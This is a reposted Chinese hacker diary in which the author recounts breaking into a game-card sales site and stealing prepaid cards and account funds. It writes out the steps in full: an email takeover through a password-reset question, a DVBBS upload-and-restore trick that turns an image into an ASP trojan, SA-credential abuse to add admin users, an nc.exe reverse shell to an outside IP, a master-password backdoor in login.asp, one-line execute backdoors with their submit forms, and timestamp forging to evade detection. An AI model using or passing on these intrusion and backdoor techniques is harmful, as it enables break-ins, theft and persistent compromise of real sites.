作者:★世界末日★
性質(zhì):原創(chuàng)

前題:

本文章技術(shù)含量并非很高,但涉及到的思路及知識(shí)應(yīng)用點(diǎn)希望可以幫助一部份和偶這樣菜的菜鳥(niǎo).

正文開(kāi)始:

11月20號(hào)下午四時(shí)許,天色已漸降臨,還有四個(gè)多小時(shí)才下班,閑著也是閑著,到<幼兒園>群里看看吧,潛水幾天了 ^_^

群里的人就是牛B,各大網(wǎng)站的站長(zhǎng)都有,N年前牛B的人也在,當(dāng)然,吹牛B的一部份也不少.

嗯,聊了幾分鐘,聊到了在網(wǎng)上黑大網(wǎng)站掛木馬,搞站賣(mài)shell,搞各種銷(xiāo)售站點(diǎn)賣(mài)錢(qián)的話題,干脆有個(gè)黑人把17173.com.cn的shell也發(fā)了出來(lái),牛B得不得了,偶對(duì)他的敬仰真是有如江水滔滔不絕,又如長(zhǎng)江決提一發(fā)不可......

現(xiàn)在的黑人們,大多數(shù)都走向職業(yè)化,所謂的職業(yè)化,也只不過(guò)是應(yīng)用掌握的技術(shù),搞點(diǎn)錢(qián)花花吧!

此時(shí)心里想,其實(shí)這也沒(méi)有什么不對(duì)的,搞技術(shù)的,不靠技術(shù)賺點(diǎn)錢(qián),就算一份工作,一個(gè)月拿那么點(diǎn)工資,有技術(shù)不等于沒(méi)有?想到這里,于是順便打聽(tīng)了一些好友的"賺錢(qián)"路子,有的說(shuō)黑大網(wǎng)站掛木馬偷帳號(hào)賣(mài)給游戲玩家賺錢(qián),有的說(shuō)直接去黑各游戲私服服務(wù)器,直接賣(mài)裝備,有的說(shuō)黑各站點(diǎn)的整站賣(mài)錢(qián)...... 另一朋友司徒對(duì)我說(shuō)，其實(shí)也可以去搞一些游戲點(diǎn)卡銷(xiāo)售的站點(diǎn)，直接拿點(diǎn)卡就OK了，聽(tīng)了不禁有些心動(dòng)。畢竟偶接觸這方面的人多，路子也多......

好吧，動(dòng)手。

打開(kāi)IE，www.google.com，輸入：“點(diǎn)卡在線銷(xiāo)售”。

出現(xiàn)的站點(diǎn)可還真不少，看來(lái)，網(wǎng)游的產(chǎn)業(yè)在互聯(lián)上的地位非同一般了，賺網(wǎng)錢(qián)的人也多了起來(lái)，嗯，偶們也賺去，^_^ , 這樣的站,什么云網(wǎng)，卡天地....多得數(shù)不清,不過(guò)偶們懶得數(shù)，看上了一個(gè)界面不錯(cuò)的，試著拿他開(kāi)刀吧。

站上有ASP，PHP的頁(yè)面，馬上想起看能不能用SQL注入，沒(méi)辦法，習(xí)慣了，SQL注入鬧得昏昏烈烈，試一下吧。

http://xxxx/card_show.asp?id=56
http://xxxx/card_show.asp?id=56'
顯示:請(qǐng)不要嘗試“',--,select,mid*********"之類(lèi)的字符，XXX防SQL注入專用系統(tǒng)!我曰,太陽(yáng)!還專用防SQL注入呢，沒(méi)門(mén)。

失敗，拿出SuperScan掃幾個(gè)常用端口，開(kāi)放的端口21，80，1433

Faint!

嘗試旁侵,打開(kāi)旁注專用工具。

掃出10多個(gè)國(guó)際域名.

呵呵，我不信你10多個(gè)站沒(méi)一個(gè)有洞，GO，逐一檢查.....

用旁注工具檢測(cè)了一通，看那些站包括:
dvbbs/dvbbs6.mdb
bbs/upfile.asp
upload_soft.asp
之類(lèi)的頁(yè)面，一分鐘過(guò)去了，程序顯示完成，昏倒，一個(gè)都沒(méi)有。
一個(gè)個(gè)打開(kāi)那些站點(diǎn)看看的時(shí)候，差點(diǎn)沒(méi)把我氣死。TMD，10幾個(gè)域名差不多全部指向同一個(gè)站，我倒!

再仔細(xì)的觀察一次，有一個(gè)站是私服的主頁(yè)，我昏哦，難道服務(wù)器上還有私服？其中一個(gè)超連接是<本站論壇>，低落的情緒馬上爆漲起來(lái)，點(diǎn)一下進(jìn)去看看。
http://xxxx/Xsfbbs/index.asp
本頁(yè)面需要cookies支持，如果你的瀏覽器不支持cookies將不能登陸本系統(tǒng)。。。。

一看就知道是動(dòng)網(wǎng)的，他的二級(jí)路徑是XsfBBS，怪不得剛才檢測(cè)不到，暈。希望論壇可以找到突破口了。

3秒鐘過(guò)去，論壇打開(kāi)了，逼不及待馬上看最下面那幾行字:

####
Powered By ：Dvbbs Version 7.0.0
?2003-2004 XXXXXXXXX網(wǎng)::網(wǎng)站聲明及發(fā)帖須知:: 聯(lián)系QQ:XXXXXXX
執(zhí)行時(shí)間：62.50000毫秒。查詢數(shù)據(jù)庫(kù)2次。 當(dāng)前模板樣式：[默認(rèn)模板]
####

(小刀評(píng)論:建議直接訪問(wèn)upfile.asp文件來(lái)判斷是否存在上傳漏洞,因?yàn)镾P2補(bǔ)丁有兩個(gè),第一個(gè)是沒(méi)有補(bǔ)上傳漏洞的)

哇，不是sp2？？不是吧？？？那偶不是可以抓包上傳ASP？高興中。。。

馬上注了一個(gè)帳號(hào)，shijiemori/pass,登陸..

打開(kāi) WSockExpert （一個(gè)專用的抓包分析等軟件）抓了登陸后的cookies，再拿出老兵的《動(dòng)網(wǎng)漏洞上傳工具》，填表上COOKIE，填上http://www.XXXX.com/Xsfbbs/upfile.asp，點(diǎn)擊上傳。。。。那個(gè)激動(dòng)呀!

(小刀評(píng)論:嘻嘻,這里犯了一個(gè)錯(cuò)誤,其實(shí)是不用抓COOKIES的,直接上傳就行了,可以的小末,每次都抓包,同情ING....)

3秒鐘過(guò)去，程序返回的信息：對(duì)不起，你發(fā)帖數(shù)量必須大于0才能上傳文件。

太陽(yáng)！靠，肯定是TMD打了sp2的補(bǔ)丁，TMD怎么下面沒(méi)改回來(lái)，誤人子弟，欺騙偶滴感情。哭ing....

(小刀評(píng)論:沒(méi)有打補(bǔ)丁,只是管理員作了限制)

天哪，你怎么可以這樣對(duì)偶捏?再找找其它的站，都是指向那卡站，昏哦，難道真沒(méi)辦法了啊？

再分析一下吧，實(shí)在不行就放棄，天下何處無(wú)芳草，留得處男在,那怕***** @_@

累了，吃飯先。。。。。。。。。。。。

半小時(shí)后，偶回來(lái)了，站長(zhǎng)，偶這下子吃飽，喝足鳥(niǎo)，又回來(lái)鳥(niǎo)。

繼續(xù)分析，這下不知道是不是吃飽喝足的原因，突然發(fā)現(xiàn)論壇下面的QQ聯(lián)系人和其它網(wǎng)站的都一個(gè)樣，HOHO`原來(lái)站長(zhǎng)乃是同一人物。習(xí)慣性來(lái)說(shuō)，他的各個(gè)地方的密碼都是一樣滴`偶嘗試一下看能不能猜他密碼先。

點(diǎn)擊了那管理員的帳號(hào)，看一下他個(gè)人資料，QQ：“XXXXXXX”，個(gè)人簽名檔里寫(xiě)著：“XXX我愛(ài)你,就像老鼠愛(ài)大米”。

當(dāng)機(jī)立斷，加了他的QQ，無(wú)意中發(fā)現(xiàn)他QQ資料也是這樣寫(xiě)，“XXXX我愛(ài)你”，XXXX是一個(gè)MM名字，他郵箱是XXXXX@163.com，去他郵箱看看。
打開(kāi)mail.163.com，點(diǎn)忘記密碼?輸入他的用戶名。到他QQ里找他的生日年月，填了上去，哈哈，果然正確，第二步，回答問(wèn)題，問(wèn)題是，我最?lèi)?ài)的人。答案我填了XXX（他QQ資料里那MM的名字），一點(diǎn)，哈哈，正確了，我靠啊，真TMD爽啊。這下子，我拿到了他的郵箱。時(shí)間是剛好7點(diǎn)。Yeah!

郵箱拿到了，郵箱里也沒(méi)什么，哈哈，就算有，對(duì)偶的幫助也不一定很大滴說(shuō)，突然靈機(jī)一動(dòng)，他的論壇密碼會(huì)不會(huì)是？？？？？？
你真聰明，猜對(duì)了，我們到他論壇的登陸頁(yè)面，敲入他的用戶名，密碼是XXXwoaini，登陸-->登陸成功!

哈哈，那個(gè)激動(dòng)啊，明天得去把六合彩，體育彩票，通通買(mǎi)光，讓TMD關(guān)門(mén)。做個(gè)世界首富不成問(wèn)題滴說(shuō)，到時(shí)豪華個(gè)人飛機(jī)，出出入入身邊PLMM一大片，晚上一個(gè)，早上一個(gè)，吃飯一個(gè)，逛街二個(gè) @_@? @_@? .........
噢，忘了，進(jìn)后臺(tái)先，找到文件上傳類(lèi)型，加上個(gè)|asp，哈哈，到首頁(yè)那個(gè)帖先。。。

嗯，點(diǎn)擊上傳我可愛(ài)的asp木馬.......

唔？唔？怎么上傳不了？靠，倒？唔？？我加了asp類(lèi)型呀,怎么還不能上傳？？？再試一次，還是失敗，我倒。后來(lái)才發(fā)現(xiàn)，動(dòng)網(wǎng)sp2就算在后臺(tái)加了|asp|cer|cdx|asa之類(lèi)的文件擴(kuò)展名，也是不能上傳滴，我，太陽(yáng)!這下子悶郁死了，N久不用動(dòng)網(wǎng)，算是偶孤陋寡聞鳥(niǎo)。。偶還沒(méi)死心，下一步，動(dòng)網(wǎng)不是有個(gè)數(shù)據(jù)庫(kù)備份功能嗎？用這個(gè)功能來(lái)實(shí)現(xiàn)圖片與ASP之前的轉(zhuǎn)換可不OK？

(小刀評(píng)論:其實(shí)從7.0的最初版開(kāi)始,已經(jīng)限制了后臺(tái)添加ASP上傳類(lèi)型,所以不用試這步了,直接備份數(shù)據(jù)庫(kù)就行了,時(shí)間也差不多)

嗯，馬上動(dòng)手。

先到首頁(yè)發(fā)個(gè)帖，把我的 "ASP木馬.asp" 改名成"asp.jpg"

發(fā)帖上傳，現(xiàn)在是JPG格式的文件，看你丫的讓不讓偶上傳 ^_^

顯示上傳成功，不過(guò)上傳后的文件名是jpg的，偶不管，記下路徑先。

此主題相關(guān)圖片如下：

再回到數(shù)據(jù)庫(kù)里找還原數(shù)據(jù)庫(kù)的頁(yè)面。HOHO~~ 好像成功在即。

嗯，點(diǎn)了一下[還原數(shù)據(jù)庫(kù)]的超連接，頁(yè)面出來(lái)了，但！！哦？嗯？？嗯？？？？？？怎么沒(méi)有恢復(fù)功能啊？？我靠，原來(lái)這個(gè)論壇是TMD是SQL數(shù)據(jù)庫(kù)的，我倒！！！這不分明是損我嗎？天哪，怎么這樣子對(duì)偶捏？？

再次郁悶......

沒(méi)辦法，得向群求救。

通過(guò)一個(gè)朋友得知，原來(lái)這樣也要以運(yùn)用數(shù)據(jù)庫(kù)的[還原功能]，嘿嘿，心動(dòng)了吧？怎么弄呢？我們繼續(xù):

在桌面新建一個(gè)wokao.htm，里面的代碼是:

<form action="http://XXXX/bbs/admin_data.asp?action=RestoreData&act=Restore" method="post">
<p>上傳后的圖片地址：<input name="Dbpath" type="text" size="80" value="UploadFile/2004-12/20041120192715291.gif"></p>
<p>木馬保存地址：<input name="backpath" type="text" size="80" value="shijiemori.asp"></p>
<p><input type="submit" value="提交"></p>
</form>
'代碼結(jié)束

上面的<from action=" " 這里的地址填上對(duì)方論壇絕對(duì)地址/admin_data.aspadmin_data.asp?action=RestoreData&act=Restore，Dbpath文件本筐里填表上上傳后的馬馬圖片地址，比如我傳的圖片地址是UploadFile/2004-12/20041120192715291.gif, backpath 文本筐里填寫(xiě)你要保存的馬馬地址，比如shijiemori.asp。
然后要做的就是點(diǎn)提交了，要是你運(yùn)氣比偶還差的話，那。。。。 要不然你肯定可以成功，成功后提示，數(shù)據(jù)庫(kù)還原成功。
哈哈，好了，成功就好，可以訪問(wèn)我的馬馬了，還想啥？哈！！！
打開(kāi)
http://XXXX/UploadFile/shijiemori.asp???? //這是偶滴馬馬地址
點(diǎn)密碼進(jìn)去。啊嘎嘎.

這樣就完成了入侵的第一步，下面直接要做的就是拿那個(gè)站的卡啦。

屬話說(shuō)得好哇！留得處男在 ,那怕*******，哈，不辛運(yùn)的日子已時(shí)過(guò)境遷，偶已經(jīng)改頭換面，從失魂落魄緊張低落到情緒高漲，又大難不死，必有后福 ^_^ ，說(shuō)了這么多，都是為了表示對(duì)管理員的硬盤(pán)不作權(quán)限設(shè)定而偶是多么多么的開(kāi)心，吼吼！！

第一件事當(dāng)然是到shell里找找他開(kāi)了那些服務(wù)

net start

已經(jīng)啟動(dòng)以下 Windows 服務(wù):

?? Application Layer Gateway Service
?? Automatic Updates
?? Background Intelligent Transfer Service
?? COM+ Event System
?? Computer Browser
?? Cryptographic Services
?? Distributed File System
?? Distributed Link Tracking Client
?? Distributed Transaction Coordinator
?? DNS Client
?? Error Reporting Service
?? Event Log
?? FTP Publishing Service
?? GhostStartService
?? Help and Support
?? IIS Admin Service
?? IPSEC Services
?? Logical Disk Manager
?? Microsoft Search
?? MSSQLSERVER
?? MSSQLServerOLAPService
?? Network Connections
?? Network Location Awareness (NLA)
?? NT LM Security Support Provider
?? Plug and Play
?? Print Spooler
?? Protected Storage
?? Remote Procedure Call (RPC)
?? Remote Registry
?? Routing and Remote Access
?? Secondary Logon
?? Security Accounts Manager
?? Serv-U FTP Server
?? Server
?? Shell Hardware Detection
?? System Event Notification
?? Task Scheduler
?? TCP/IP NetBIOS Helper
?? Terminal Services
?? Windows Audio
?? Windows Management Instrumentation
?? Windows Time
?? WinHTTP Web Proxy Auto-Discovery Service
?? Wireless Configuration
?? Workstation
?? World Wide Web Publishing Service

命令成功完成。

hohoho,注意到倒數(shù)第8條了嗎？TMD開(kāi)了終端，竟把端口改了，再輸入命令。

netstat -an

Active Connections

? Proto? Local Address????????? Foreign Address??????? State
? TCP??? 0.0.0.0:21???????????? 0.0.0.0:0????????????? LISTENING
? TCP??? 0.0.0.0:80???????????? 0.0.0.0:0????????????? LISTENING
.......
? TCP??? 0.0.0.0:3247?????????? 0.0.0.0:0????????????? LISTENING
? TCP??? 127.0.0.1:3721???????? 0.0.0.0:0????????????? LISTENING
? TCP??? 127.0.0.1:1433???????? 0.0.0.0:0????????????? LISTENING
? TCP??? 127.0.0.1:43958??????? 0.0.0.0:0????????????? LISTENING
.......
? TCP??? xxx.xxx.xxx.xxx:21???? 219.137.65.165:1916??? ESTABLISHED
? TCP??? xxx.xxx.xxx.xxx:80???? 61.49.255.129:4047???? ESTABLISHED
? TCP??? xxx.xxx.xxx.xxx:80???? 61.145.209.148:2277??? ESTABLISHED
? TCP??? xxx.xxx.xxx.xxx:80???? 61.149.12.214:14816??? ESTABLISHED
***************************
(以下省略)

(小刀評(píng)論:如果有執(zhí)行權(quán)限的話,建議用c3389.exe這個(gè)小程序,直接顯示出終端服務(wù)的端口,要不就netstat -an -p tcp)

嘗試了一下幾個(gè)端口連接，最后確定，3721是真正的終端端口，小樣還是win2003系統(tǒng)。hhoo.

馬上提升權(quán)限，問(wèn)小刀借了個(gè)serv-u5.2版本以下的Serv-U本地權(quán)限提升程序和一個(gè)nc.exe

(小刀評(píng)論:對(duì)Serv-u6.0也通用)

先反彈回來(lái)一個(gè)shell，在對(duì)方系統(tǒng)上輸入d:\www\wwwroot\nc.exe -e cmd.exe xxx.xxx.xxx.xxx 4321

在本機(jī)c:\nc.exe -vv -l -p 4321

shell馬上就回來(lái)了，執(zhí)行提升命令，d:\www\wwwroot\servulocal.exe "d:\www\wwwroot\nc.exe -l -p 99 -e cmd.exe"

不過(guò)，很抱謙，執(zhí)行不成功，為啥？因?yàn)樗腇TP不存在漏洞，補(bǔ)丁早打了，Faint!

接著回去他的卡站目錄，查看一下CONN.ASP文件（通常網(wǎng)站連接數(shù)據(jù)庫(kù)都用此文件名），內(nèi)容如下：

Session.Timeout=115
if request("b_rules")=1 then
Response.Buffer = True
else
Response.Buffer = True
Response.ExpiresAbsolute = Now() - 1
Response.Expires = 0
Response.CacheControl = "no-cache"
end if
sitetitle=" - 點(diǎn)卡在線銷(xiāo)售系統(tǒng)"

?dim conn??
?dim connstr??
?on error resume next

?connstr = "driver={sql server};server=localhost;uid=sa;pwd=XXXwoaini;database=cardsbuy;"

?set conn=server.createobject("ADODB.CONNECTION")
?if err.number<>0 then
??err.clear
??set conn=nothing
??response.write "數(shù)據(jù)庫(kù)連接出錯(cuò)！"
??Response.End
?else
??conn.open connstr
??if err then
???err.clear
???set conn=nothing
???response.write "數(shù)據(jù)庫(kù)連接出錯(cuò)！"
???Response.End
??end if
?end if??
?
?sub endConnection()
??conn.close
??set conn=nothing
?end sub
##############################
看到這里我不禁笑了出來(lái)，數(shù)據(jù)庫(kù)用SA連接。管理員還真TMD可愛(ài)呀，嗯，他不小心，偶開(kāi)心。hoho..

馬上找出SQLexec (一個(gè)遠(yuǎn)程的SQL連接工具),填上用戶，密碼，連接成功。
打入命令
net user shijimori hack /add
命令成功完成。
net localgroup administrators shijiemori /add
命令成功完成。

(小刀評(píng)論:偶更喜歡用藍(lán)芒的那個(gè)SQLTOOLS)

馬上連接對(duì)方的終端，填表上用戶，密碼，OK，進(jìn)去鳥(niǎo)，哈哈......

習(xí)慣性第一件事要做的，克隆一下guest帳號(hào)（克隆帳號(hào)的方法可去www.cnsu.org找“克隆管理員帳號(hào)就可獲得相關(guān)資料），然后注銷(xiāo)，用guest登陸，刪掉剛才那個(gè)用戶的登陸記錄及用戶。
打開(kāi)他的SQL企業(yè)管理器，所有的帳號(hào)馬上逞現(xiàn)在眼前，嘿嘿嘿，先把他的SQL數(shù)據(jù)庫(kù)備份一下，然后拉回本地，在本地裝個(gè)SQL數(shù)據(jù)庫(kù)，再把他的數(shù)據(jù)庫(kù)還原到本地，這下子輕松多了。
不過(guò)，他的密碼是MD5加密的，想用他們客戶的帳號(hào)進(jìn)去買(mǎi)東西，還得一個(gè)一個(gè)改MD5密碼，昏，麻煩。
后來(lái)便寫(xiě)了一個(gè)專門(mén)讀卡的小小ASP頁(yè)面，放上去，直接顯示卡號(hào)密碼，爽。。留了幾個(gè)ASP木馬，沖了幾十個(gè)QB。
這時(shí)候也差不多到時(shí)間下班了，嗯。擦擦屁股走人先。。。

這樣，讀卡頁(yè)面一直用，過(guò)了7天。。。。。。。。。

11月28號(hào)

再次登陸那個(gè)卡站的時(shí)候，發(fā)現(xiàn)讀卡頁(yè)面被刪，一下子心跳起來(lái)，既然被發(fā)現(xiàn)了，一不做二不休，把他的錢(qián)花光，轉(zhuǎn)帳。

找到了一個(gè)一級(jí)管理員的帳號(hào)，改了他的密碼，把他的帳號(hào)余額一萬(wàn)多元，全部轉(zhuǎn)到esales自己用戶上。并且向自己的QQ中轉(zhuǎn)帳一千多個(gè)QB.

當(dāng)時(shí)真傻，這樣的事情都做得出來(lái)，原來(lái)，在他們系統(tǒng)里轉(zhuǎn)帳還得經(jīng)過(guò)他總后臺(tái)同意，這樣一來(lái)，我暴露了自己的QQ和esales的帳戶。

###############
11月29日下午上線的時(shí)候，發(fā)現(xiàn)QQ里來(lái)了10多條這樣的信息:

用戶xxxxxxxx請(qǐng)求你通過(guò)身份驗(yàn)證

附加消息:公安已經(jīng)立案了 IP地址他們已經(jīng)查到了 丟了2000多元卡

用戶xxxxxxxx請(qǐng)求你通過(guò)身份驗(yàn)證

附加消息:這些錢(qián) 都是這個(gè)IP地址的人賠給我 公安已經(jīng)保證過(guò)了

用戶xxxxxxxx請(qǐng)求你通過(guò)身份驗(yàn)證

附加消息:還要另外賠給我電話費(fèi)等100元 我勝利了：}

用戶xxxxxxxx請(qǐng)求你通過(guò)身份驗(yàn)證

附加消息:你們的 世界末日し要到了

................
..............
............
###############

當(dāng)時(shí)緊張了3秒，然后恢復(fù)平靜，那站長(zhǎng)說(shuō)的是實(shí)話？還是恐嚇之類(lèi)的話，他不怕人家格他硬盤(pán)？

呵呵，怕他是小鳥(niǎo)，我們繼續(xù)，換了一個(gè)韓國(guó)肉雞，登陸他的終端，發(fā)現(xiàn)我的guest密碼已經(jīng)不對(duì)了。

還好，SA還能連得上去，還可以加用戶，哈哈哈。馬上加了一個(gè)用戶，又上終端，在他的login.asp(登陸頁(yè)面)找到這么一句，加了這么一句話:

if trim(rst("userpassword"))<>trim(md5(request("password"))) then
response.write("<script>alert('帳號(hào)或密碼錯(cuò)誤！請(qǐng)確認(rèn)后再提交。');history.go(-1)</script>")
response.end
end if

這是登陸驗(yàn)證頁(yè)面，我在這句代碼了做了些手腳，把代碼改成：

if trim(rst("userpassword"))<>trim(md5(request("password"))) then
password1=request("password")
if password1<>"shijiemori" then
response.write("<script>alert('帳號(hào)或密碼錯(cuò)誤！請(qǐng)確認(rèn)后再提交。 (Err=0103)');history.go(-1)</script>")
response.end
end if
end if

這句意思是說(shuō)，當(dāng)檢測(cè)到對(duì)方的密碼不正確，并且提交的密碼不是"shijiemori"的時(shí)候才顯示密碼錯(cuò)誤，也就是說(shuō)，我用任何一個(gè)用戶，輸入shijiemori這個(gè)密碼，他都是正確的。哈哈。這就成了“萬(wàn)能密碼”
今天特意在他一個(gè)比較隱蔽的地方，再放了一個(gè)ASP后門(mén)，以后每次都用這個(gè)后門(mén)登陸，并且修改他的硬盤(pán)資料。
同時(shí)也在N個(gè)頁(yè)面里放了一句這樣的代碼（一句話后門(mén)）：
<%
shijiemori=request("shijiemori")
if shijiemori="trun" then
execute request("o")
end if
%>
注：上面這句話功能非常強(qiáng)大，文章后面再作介紹.

12月7日

當(dāng)我再登陸后門(mén)的時(shí)候，發(fā)現(xiàn)后門(mén)也已經(jīng)被刪了，faint，心想管理員已經(jīng)嚴(yán)重發(fā)現(xiàn)了我的存在。

沒(méi)關(guān)系，在他的index.asp里，我還有一句話后門(mén)。在本地構(gòu)建一個(gè)提交post.htm頁(yè)面，內(nèi)容如下：

<form action=http://XXXX/index.asp method=post>
<input type="hidden" name="system" value="shijiemori">
<textarea name=o cols=120 rows=10 width=45>set lP=server.CreateObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("p")
lP.SaveToFile server.mappath("shijiemori.asp"),2
lP.Close
set lP=nothing
response.redirect "shijiemori.asp"
</textarea>
<textarea name=p cols=120 rows=10 width=45>木馬</textarea><BR><center><br>
<input type=submit value=提交></form>

'代碼完成

把上面的“木馬”改成你的木馬代碼，點(diǎn)擊上傳，就會(huì)在跟目錄寫(xiě)入一個(gè)shijiemori.asp的木馬，便可以用
http://XXXX/shijiemori.asp登陸

這樣，我還是對(duì)他的服務(wù)器有看管理的權(quán)力。

12月12日

我把讀卡面頁(yè)設(shè)為本地讀取，在本地連接他的SQL服務(wù)器，本地操作相當(dāng)于遠(yuǎn)程操作，加錢(qián)，或增加用戶，或管理數(shù)據(jù)庫(kù)，呵呵。

12月14日

對(duì)方SQL服務(wù)器已經(jīng)不對(duì)外了，心想是他發(fā)現(xiàn)了外部的連接，曰！他只對(duì)LOCALHOST開(kāi)放,再 日。連不上去了，沒(méi)辦法，還得上去他服務(wù)器。

通過(guò)前面一句話木馬我們還可以寫(xiě)木馬進(jìn)去，但是。。。。。。。。。但是。。。。。。。。。。。

寫(xiě)進(jìn)去的木馬幾分鐘后就被刪了，原來(lái)，管理員對(duì)硬盤(pán)的文件實(shí)時(shí)監(jiān)控，一發(fā)現(xiàn)有新增的文件或新修改的文件，都去檢查一遍。

所以，我不敢寫(xiě)木馬了，但，我還是可以用他的帳號(hào)并且萬(wàn)能密碼進(jìn)去取卡。hoho.

這里我想聰明的你一定會(huì)問(wèn)，為什么他沒(méi)發(fā)現(xiàn)我登陸的頁(yè)面做了手腳？因?yàn)?#xff0c;我修改了那個(gè)文件的修改日期。

修改文件的日期程序目前我發(fā)現(xiàn)有2個(gè)，一個(gè)GUI界面，一個(gè)DOS，小刀給偶滴。比如把c:\windows\system32\cmd.exe的建立日期修改為2004年12月24日，這樣管理員就不容易查出來(lái)啦。
所以，我的后門(mén)逃過(guò)此劫。
12月17日

對(duì)方重裝了系統(tǒng)，所有的硬盤(pán)分區(qū)都不可寫(xiě)。只能讀，昏倒。不能寫(xiě)還能做什么？你一定會(huì)問(wèn)。

這里，我得嚴(yán)重介紹剛才一句話目馬的應(yīng)用了。

在本地構(gòu)造提交頁(yè)面fso.htm，內(nèi)容如下：

<form action=http://xxxx/index.asp method=post>
<input type="hidden" name="system" value="mori">
<textarea name=o cols=120 rows=10 width=45>response.write "<textarea rows=""9"" name=""s1"" cols=""43"">"
set FsObj=Server.CreateOBject("Scripting.FileSystemObject")
filepath="D:\www\wwwroot\conn.asp"
Set txtsObj = FsObj.openTextFile(FilePath,1,false)
if txtsObj.atEndOfStream then
Response.write "No file"
else
Response.Write txtsObj.Readall
end if
response.write "</textarea>"
</textarea> <BR><center><br>
<input type=submit value=提交></form>

'代碼完成

點(diǎn)擊提交，這樣就把D:\www\wwwroot\conn.asp的內(nèi)容顯示了出來(lái)，呵呵。。。

得到數(shù)據(jù)庫(kù)連接文件后我們可以執(zhí)行任何數(shù)據(jù)庫(kù)命令。

比如

conn.execute ("update admin set password='123456' where username='admin'")
改管理員密碼。
這樣子我還是照樣可以拿他數(shù)據(jù)庫(kù)的用戶列表或卡哈哈。

12月22日

管理員瘋了，在首頁(yè)和登陸頁(yè)面上把所有人的IP都禁止，只給他的客戶訪問(wèn)，當(dāng)客戶聯(lián)系他并且提供客戶的IP地址給他的時(shí)候，他便把客戶的IP寫(xiě)進(jìn)數(shù)據(jù)庫(kù)驗(yàn)證，偶又進(jìn)不去鳥(niǎo)。其中，驗(yàn)證代碼如下：

<!--#include file="conn.asp"-->
<%
'IP限制函數(shù)
dim rs,str1,str2,str3,str4,num,sip,movieip
sip=Request.ServerVariables("HTTP_X_FORWARDED_FOR")
if sip="" then sip=Request.ServerVariables("REMOTE_ADDR")
? if isnumeric(left(sip,2)) then
?? str1=left(sip,instr(sip,".")-1)
?if str1<100 then
? str1=cint(str1)+300
?end if
?? sip=mid(sip,instr(sip,".")+1)
?? str2=left(sip,instr(sip,".")-1)
?? sip=mid(sip,instr(sip,".")+1)
?? str3=left(sip,instr(sip,".")-1)
?? str4=mid(sip,instr(sip,".")+1)
??? if isNumeric(str1)=0 or isNumeric(str2)=0 or isNumeric(str3)=0 or isNumeric(str4)=0 then
??? else
???? num=cint(str1)*256*256*256+cint(str2)*256*256+cint(str3)*256+cint(str4)-1
???? set rs=conn.execute("select id from [lockip] where ip1<="&num&" and ip2>="&num&" ")
?????? if rs.eof and rs.bof then
??????? movieip=1
?????? else
??????? movieip=0?
?????? end if
rs.close
set rs=nothing
end if
end if

'IP限制
if movieip=1 then
?response.write "<script>alert('您的IP已經(jīng)被限制不能訪問(wèn)，請(qǐng)和管理員聯(lián)系!');</script><script>window.close();</script>"
?response.end
end if
%>

呵呵，真BT，不過(guò)，你夠BT，偶們也BT，行動(dòng)，構(gòu)造以下ip.htm代碼提交：
下面的XXXXX.asp是偶另一個(gè)后門(mén) ^_^

<form action=http://xxxx/XXXXX.asp method=post>
<input type="hidden" name="system" value="mori">
<textarea name=o cols=120 rows=10 width=45>
'以下把我的IP段按他的算法格式寫(xiě)入數(shù)據(jù)庫(kù)，我看你牛不牛。
conn.execute ("Update lockip set ip1='365820xxxx',ip2='365820xxxx' where id='1'")</textarea> <BR><center><br>
<input type=submit value=提交></form>

這樣就可以把你的IP寫(xiě)到他數(shù)據(jù)庫(kù)，也就可以正常訪問(wèn)了。哈哈！！！！！！！！

至于以后偶怎么對(duì)待這個(gè)服務(wù)器，下次再寫(xiě)。

12月24日

這篇文章隨著生蛋節(jié)而蛋生。真心希望以上的心得及代碼對(duì)大家有所幫助。謝謝。。。

??????????????????? ----世界末日---- QQ:36117077? 原創(chuàng)

?

(小刀評(píng)論:總得來(lái)說(shuō),這篇文章寫(xiě)得還不錯(cuò),思路挺妙的,運(yùn)氣也有很大成份,也有一定的原創(chuàng)精神.,嘻嘻)

轉(zhuǎn)載于:https://www.cnblogs.com/webcool/archive/2005/01/17/92819.html

總結(jié)

以上是生活随笔為你收集整理的黑客与网管的30天较量的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。